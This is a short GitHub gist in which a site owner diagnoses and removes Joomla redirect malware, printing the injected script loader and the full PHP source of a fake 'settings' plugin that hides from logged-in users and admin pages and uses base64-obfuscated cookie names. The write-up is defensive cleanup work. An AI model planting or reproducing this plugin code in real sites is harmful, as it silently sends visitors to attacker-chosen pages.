Skip to content

Instantly share code, notes, and snippets.

@mrl22

mrl22/README.md

Last active April 7, 2023 15:58
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save mrl22/7937f1fbc26f1d6f590a22ae3f8fa6a6 to your computer and use it in GitHub Desktop.
Save mrl22/7937f1fbc26f1d6f590a22ae3f8fa6a6 to your computer and use it in GitHub Desktop.
Download ZIP
Joomla Redirection Malware Fix - Is your Joomla site ramdomly redirecting to spam sites?
Raw
README.md

I found this webpage useful to start with: https://www.getastra.com/blog/911/joomla-malicious-redirects/

My next step was to see if I can get the source code for the redirect happening. I used https://www.view-page-source.com/ to get the source code anonymously hoping it would trigger and it did!

The malware injected the following into the head:

<script src="https://code.jquery.com/jquery-3.3.1.min.js"></script>
<script>
var khutmhpx = document.createElement("script");
khutmhpx.src = "https://[URL-REMOVED]";
document.getElementsByTagName("head")[0].appendChild(khutmhpx);
</script>

I then searched the whole Joomla php source code for "khutmhpx" and found a Joomla plugin called "settings" located at "plugins/system/settings/settings.php" which had been installed and activated. Looking at the initialization of this plugin and its only purpose was the following:

<?php

/**
 * @Enterprise: Joomla! Project 
 * @author: Joomla! Project 
 * @url: http://www.github.com
 * @license: GNU/GPLv3 http://www.gnu.org/licenses/gpl-3.0.html
 * @copyright: github.com
 *
 * Custom settings plugin;
 * https://github.com
 * License: MIT License 
 */

defined('_JEXEC') or die;

class plgSystemSettings extends JPlugin
{
	public function onAfterInitialise()
	{
		$user = JFactory::getUser();
		$mainframe = JFactory::getApplication();
		if ( $user -> id > 0 ) {
			// user route
		} else {
			// non-user route
			$current_url = JUri::getInstance();
			if (stristr($current_url, "/admin")) {
				// admin-panel route
			} else {
				if ( ! isset( $_COOKIE[base64_decode('cl9vaw==')]) ) {
					setcookie( base64_decode( 'cl9vaw==' ), 1, time() + 86400, base64_decode( 'Lw==' ) );
					echo '<script src="https://code.jquery.com/jquery-3.3.1.min.js"></script>
<script>
var khutmhpx = document.createElement("script");
khutmhpx.src = "https://[URL-REMOVED]";
document.getElementsByTagName("head")[0].appendChild(khutmhpx);
</script>
';
				}
			}
		}
	}
}

To summarise what this code is doing:

IF:

  1. The visitor is not logged in.
  2. Not visiting /admin
  3. "the cookie" is not present

THEN:

  1. Set a cookie which expires in 1 day.
  2. Inject javascript into the head of the page, which loads a script from another URL.

The script from another URL contains a redirection code to the malware of their choosing.

To fix, I zipped/backed up the settings directory and then deleted it.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment